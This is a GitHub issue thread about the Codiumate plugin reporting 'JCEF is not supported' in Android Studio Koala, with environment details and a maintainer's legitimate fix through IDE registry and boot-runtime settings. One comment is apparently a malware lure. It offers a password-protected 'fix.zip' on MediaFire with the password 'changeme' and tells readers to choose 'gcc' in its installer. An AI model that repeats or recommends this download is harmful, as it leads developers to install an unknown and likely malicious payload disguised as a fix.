### ISSUE TITLE
[0.9.3][ANDROID STUDIO Koala | 2024.1.1 Patch 2] JCEF is not supported.

### ISSUE THREAD

**Issue by payal-iroid** [Codium-ai/codiumai-jetbrains-release#281]
# User Description
JCEF is not supported.
JCEF is manually disabled via 'ide.browser.jcef.enabled=false'
requestId=a087224d-318b-4885-a34b-1da13936b116

# Stack Trace
```

```

# Other Information
```
=== About ===
Build version: Android Studio Koala | 2024.1.1 Patch 2 Build: #AI-241.18034.62.2411.12169540 August 1, 2024
Theme: Dark
JRE: 17.0.11+0-17.0.11b1207.24-11852314, JetBrains s.r.o.
JVM: 17.0.11+0-17.0.11b1207.24-11852314, OpenJDK 64-Bit Server VM, JetBrains s.r.o.
Operating System: Mac OS X 12.5 (x86_64)

=== Plugins ===
Custom plugins: [Json Parser (1.7.1), JetBrains Marketplace Licensing (241.18034.106), CodeGlance Pro (1.8.5), JSON To Kotlin Class (JsonToKotlinClass) (3.7.4), ADB Wi-Fi (1.2.6), Any to JSON (2.19.0), kotlin-builder-generator (2.0.0), Kotlin KDoc Formatter (1.6.4), adb_idea (1.6.17), DTO generator (V0.997), Kotlin Fill Class (1.0.23), GitHub Copilot (1.5.20.6554), GitToolBox (500.2.15+233), .ignore (4.5.3), Codiumate - Code, test and review with confidence - by CodiumAI (0.9.3)]
Disabled plugins:[Codeium: AI Autocomplete and Chat for Python, JS, Java, Go... (1.8.28)]
```

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ArtsiomCh** [comment]
Please follow proposed fix and it should help:

> 1. Navigate to the Help -> Find Action... and find(type) "Registry". Here disable `ide.browser.jcef.sandbox.enable` option (and **make sure `ide.browser.jcef.enabled` option is enabled);**
>   2. Navigate to the Help -> Find Action... and find(type) "Choose Boot Runtime for the IDE" dialog. Here, you can select a boot runtime equipped with JCEF;
>   3. Restart the IDE.
